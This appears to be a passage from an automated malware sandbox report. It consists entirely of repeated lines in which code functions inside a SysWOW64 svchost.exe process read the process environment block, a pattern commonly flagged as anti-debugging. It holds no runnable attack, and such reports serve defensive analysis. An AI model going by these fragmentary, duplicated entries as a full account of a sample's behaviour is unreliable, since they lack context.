                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C310 mov ecx, dword ptr fs:[00000030h]1_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750310 mov ecx, dword ptr fs:[00000030h]1_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]1_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]1_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]1_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]1_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]1_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]1_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037663FF mov eax, dword ptr fs:[00000030h]1_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]1_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]1_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE3DB mov ecx, dword ptr fs:[00000030h]1_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE3DB mov eax, dword ptr fs:[00000030h]1_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D43D4 mov eax, dword ptr fs:[00000030h]1_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D43D4 mov eax, dword ptr fs:[00000030h]1_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EC3CD mov eax, dword ptr fs:[00000030h]1_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A3C0 mov eax, dword ptr fs:[00000030h]1_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]1_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]1_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]1_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037383C0 mov eax, dword ptr fs:[00000030h]1_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B63C0 mov eax, dword ptr fs:[00000030h]1_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]1_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]1_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728397 mov eax, dword ptr fs:[00000030h]1_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]1_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]1_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E388 mov eax, dword ptr fs:[00000030h]1_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375438F mov eax, dword ptr fs:[00000030h]1_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375438F mov eax, dword ptr fs:[00000030h]1_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0274 mov eax, dword ptr fs:[00000030h]1_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]1_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]1_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734260 mov eax, dword ptr fs:[00000030h]1_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372826B mov eax, dword ptr fs:[00000030h]1_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A250 mov eax, dword ptr fs:[00000030h]1_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736259 mov eax, dword ptr fs:[00000030h]1_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA250 mov eax, dword ptr fs:[00000030h]1_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA250 mov eax, dword ptr fs:[00000030h]1_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B8243 mov eax, dword ptr fs:[00000030h]1_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B8243 mov ecx, dword ptr fs:[00000030h]1_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372823B mov eax, dword ptr fs:[00000030h]1_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]1_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]1_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402E1 mov eax, dword ptr fs:[00000030h]1_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402A0 mov eax, dword ptr fs:[00000030h]1_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037402A0 mov eax, dword ptr fs:[00000030h]1_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov ecx, dword ptr fs:[00000030h]1_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C62A0 mov eax, dword ptr fs:[00000030h]1_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E284 mov eax, dword ptr fs:[00000030h]1_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E284 mov eax, dword ptr fs:[00000030h]1_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]1_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]1_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B0283 mov eax, dword ptr fs:[00000030h]1_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C156 mov eax, dword ptr fs:[00000030h]1_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C8158 mov eax, dword ptr fs:[00000030h]1_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736154 mov eax, dword ptr fs:[00000030h]1_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736154 mov eax, dword ptr fs:[00000030h]1_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]1_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]1_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov ecx, dword ptr fs:[00000030h]1_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]1_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C4144 mov eax, dword ptr fs:[00000030h]1_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03760124 mov eax, dword ptr fs:[00000030h]1_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA118 mov ecx, dword ptr fs:[00000030h]1_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]1_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]1_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA118 mov eax, dword ptr fs:[00000030h]1_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038061E5 mov eax, dword ptr fs:[00000030h]1_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F0115 mov eax, dword ptr fs:[00000030h]1_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov eax, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DE10E mov ecx, dword ptr fs:[00000030h]1_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037601F8 mov eax, dword ptr fs:[00000030h]1_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]1_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]1_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]1_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]1_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F61C3 mov eax, dword ptr fs:[00000030h]1_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F61C3 mov eax, dword ptr fs:[00000030h]1_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]1_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]1_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]1_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]1_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804164 mov eax, dword ptr fs:[00000030h]1_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804164 mov eax, dword ptr fs:[00000030h]1_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]1_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]1_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]1_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03770185 mov eax, dword ptr fs:[00000030h]1_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EC188 mov eax, dword ptr fs:[00000030h]1_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EC188 mov eax, dword ptr fs:[00000030h]1_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4180 mov eax, dword ptr fs:[00000030h]1_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4180 mov eax, dword ptr fs:[00000030h]1_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375C073 mov eax, dword ptr fs:[00000030h]1_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732050 mov eax, dword ptr fs:[00000030h]1_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6050 mov eax, dword ptr fs:[00000030h]1_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6030 mov eax, dword ptr fs:[00000030h]1_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A020 mov eax, dword ptr fs:[00000030h]1_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C020 mov eax, dword ptr fs:[00000030h]1_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]1_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]1_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]1_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]1_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B4000 mov ecx, dword ptr fs:[00000030h]1_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]1_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C0F0 mov eax, dword ptr fs:[00000030h]1_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037720F0 mov ecx, dword ptr fs:[00000030h]1_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037380E9 mov eax, dword ptr fs:[00000030h]1_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B60E0 mov eax, dword ptr fs:[00000030h]1_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B20DE mov eax, dword ptr fs:[00000030h]1_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F60B8 mov eax, dword ptr fs:[00000030h]1_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F60B8 mov ecx, dword ptr fs:[00000030h]1_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C80A8 mov eax, dword ptr fs:[00000030h]1_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373208A mov eax, dword ptr fs:[00000030h]1_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738770 mov eax, dword ptr fs:[00000030h]1_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]1_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730750 mov eax, dword ptr fs:[00000030h]1_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE75D mov eax, dword ptr fs:[00000030h]1_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772750 mov eax, dword ptr fs:[00000030h]1_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772750 mov eax, dword ptr fs:[00000030h]1_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B4755 mov eax, dword ptr fs:[00000030h]1_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376674D mov esi, dword ptr fs:[00000030h]1_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376674D mov eax, dword ptr fs:[00000030h]1_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376674D mov eax, dword ptr fs:[00000030h]1_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376273C mov eax, dword ptr fs:[00000030h]1_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376273C mov ecx, dword ptr fs:[00000030h]1_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376273C mov eax, dword ptr fs:[00000030h]1_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AC730 mov eax, dword ptr fs:[00000030h]1_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C720 mov eax, dword ptr fs:[00000030h]1_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C720 mov eax, dword ptr fs:[00000030h]1_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730710 mov eax, dword ptr fs:[00000030h]1_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03760710 mov eax, dword ptr fs:[00000030h]1_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C700 mov eax, dword ptr fs:[00000030h]1_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037347FB mov eax, dword ptr fs:[00000030h]1_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037347FB mov eax, dword ptr fs:[00000030h]1_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]1_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]1_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]1_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE7E1 mov eax, dword ptr fs:[00000030h]1_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373C7C0 mov eax, dword ptr fs:[00000030h]1_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B07C3 mov eax, dword ptr fs:[00000030h]1_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037307AF mov eax, dword ptr fs:[00000030h]1_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E47A0 mov eax, dword ptr fs:[00000030h]1_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D678E mov eax, dword ptr fs:[00000030h]1_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03762674 mov eax, dword ptr fs:[00000030h]1_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F866E mov eax, dword ptr fs:[00000030h]1_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F866E mov eax, dword ptr fs:[00000030h]1_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A660 mov eax, dword ptr fs:[00000030h]1_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A660 mov eax, dword ptr fs:[00000030h]1_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374C640 mov eax, dword ptr fs:[00000030h]1_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E627 mov eax, dword ptr fs:[00000030h]1_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03766620 mov eax, dword ptr fs:[00000030h]1_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768620 mov eax, dword ptr fs:[00000030h]1_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373262C mov eax, dword ptr fs:[00000030h]1_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772619 mov eax, dword ptr fs:[00000030h]1_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE609 mov eax, dword ptr fs:[00000030h]1_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]1_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]1_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]1_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]1_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B06F1 mov eax, dword ptr fs:[00000030h]1_2_037B06F1
